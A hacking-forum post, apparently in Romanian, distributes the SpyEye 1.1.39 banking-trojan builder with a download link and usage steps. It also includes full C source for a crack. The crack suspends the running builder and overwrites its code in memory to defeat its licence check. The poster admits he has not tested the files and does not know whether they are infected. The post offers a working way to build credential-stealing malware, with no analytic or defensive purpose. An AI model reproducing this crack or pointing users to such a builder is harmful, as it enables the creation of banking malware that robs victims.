Jump to content
Nytro

SpyEye.1.1.39.Builder+Patch

By Nytro, in Programe hacking

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

SpyEye.1.1.39.Builder+Patch

Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Nici nu stiu daca mai e postat.

1709b.png

1.Start SpyEye.exe

2.Start SpyEyePatch.exe - Klick OK

3.Klick Ok in SpyEye error message and enjoy the Builder

Download:

http://www.multiupload.com/ZEAYSEAU4W

SpyEyePatch SourceCode:

#include <Windows.h>
#include <tlhelp32.h>

typedef LONG ( NTAPI *_NtSuspendProcess )( IN HANDLE ProcessHandle );
typedef LONG ( NTAPI *_NtResumeProcess )( IN HANDLE ProcessHandle );

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {

        TOKEN_PRIVILEGES priv;
        HANDLE hThis, hToken;
        LUID luid;
        hThis = GetCurrentProcess();
        OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken);
        LookupPrivilegeValue(0, "seDebugPrivilege", &luid);
        priv.PrivilegeCount = 1;
        priv.Privileges[0].Luid = luid;
        priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0);
        CloseHandle(hToken);
        CloseHandle(hThis);

        HANDLE ProcessHandle = 0;
        _NtSuspendProcess NtSuspendProcess = 0;
        _NtResumeProcess NtResumeProcess = 0;
        PROCESSENTRY32 processInfo;
        processInfo.dwSize = sizeof(processInfo);
        HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
        CHAR processName[] = "SpyEye.exe";
        DWORD PID = 0 ;


        DWORD Patch1 = 0x4010C5;
        DWORD Patch2 = 0x4010CA;
        DWORD Patch3 = 0x4010CC;
        DWORD Patch4 = 0x4010CD;

        UCHAR PatchVal1[] = "\xB8\x0C\x11\x40\x00";
        UCHAR PatchVal2[] = "\xFF\xD0";
        UCHAR PatchVal3[] = "\x90";
        UCHAR PatchVal4[] = "\x90";


        NtSuspendProcess = (_NtSuspendProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtSuspendProcess" );
        NtResumeProcess = (_NtResumeProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtResumeProcess" );


        if ( processesSnapshot == INVALID_HANDLE_VALUE ){
                return 0;
        }
        Process32First(processesSnapshot, &processInfo);

        while ( Process32Next(processesSnapshot, &processInfo)){
                if ( !strcmp(processName,processInfo.szExeFile)){
                        CloseHandle(processesSnapshot);
                        PID = processInfo.th32ProcessID;
                        break;
                }
        }
        if(PID != NULL){
                //MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0);   
                ProcessHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID);
        }
        if ( ProcessHandle != NULL ){
                NtSuspendProcess( ProcessHandle );

                WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1)-1, NULL);
                WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2)-1, NULL);
                WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3)-1, NULL);
                WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4)-1, NULL);
                /*
                004010C5   B8 0C114000      MOV EAX,SpyEye.0040110C
                004010CA   FFD0             CALL EAX
                004010CC   90               NOP
                004010CD   90               NOP
                */
                MessageBoxA(NULL,"SpyEye should have been patched now.\nJust press OK and enjoy","SpyEye-Patch by Zer0Flag",0);

                NtResumeProcess( ProcessHandle );
                CloseHandle(ProcessHandle);
        }
        return 0;
}

Sursa: SpyEye.1.1.39.Builder+Pat ch - r00tsecurity

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...